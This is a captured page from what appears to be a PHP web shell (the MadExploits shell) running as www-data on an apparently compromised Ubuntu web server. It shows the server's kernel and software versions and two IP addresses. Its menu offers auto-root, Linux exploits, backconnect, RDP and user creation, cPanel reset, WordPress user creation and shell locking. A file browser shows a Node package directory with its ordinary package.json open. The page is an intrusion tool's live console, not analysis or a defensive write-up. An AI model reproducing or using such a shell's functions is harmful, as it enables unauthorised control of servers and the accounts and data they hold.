Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
html-entities /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
LICENSE
1.03
KB
-rw-r--r--
README.md
2.31
KB
-rw-r--r--
index.js
231
B
-rw-r--r--
package.json
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "html-entities", "version": "1.2.1", "description": "Faster HTML entities encode/decode library.", "keywords": [ "html", "html entities", "html entities encode", "html entities decode", "entities", "entities encode", "entities decode" ], "author": { "name": "Marat Dulin", "email": "mdevils@yandex.ru" }, "dependencies": {}, "devDependencies": { "chai": "^1.9.1", "mocha": "^1.21.4", "unit-coverage": "^3.0.1", "node-html-encoder": "*", "entities": "*", "coveralls": "^2.11.2" }, "repository": { "type": "git", "url": "https://github.com/mdevils/node-html-entities.git" }, "main": "index", "engines": [ "node >= 0.4.0" ], "unit-coverage": { "common": [ "-s", "lib/**/*.js", "-t", "test/**/*.js" ] }, "scripts": { "test": "mocha --recursive -R spec test", "benchmark": "node benchmark/benchmark", "coverage": "unit-coverage run -p common", "coverage-html": "unit-coverage run -p common -r html -o coverage.html", "travis": "npm test && unit-coverage run -p common -r lcov -o coverage.lcov && cat coverage.lcov | coveralls" }, "files": [ "index.js", "lib", "LICENSE" ], "license": "MIT" ,"_resolved": "https://registry.npmjs.org/html-entities/-/html-entities-1.2.1.tgz" ,"_integrity": "sha1-DfKTUfByEWNRXfueVUPl9u7VFi8=" ,"_from": "html-entities@^1.2.1" }
Close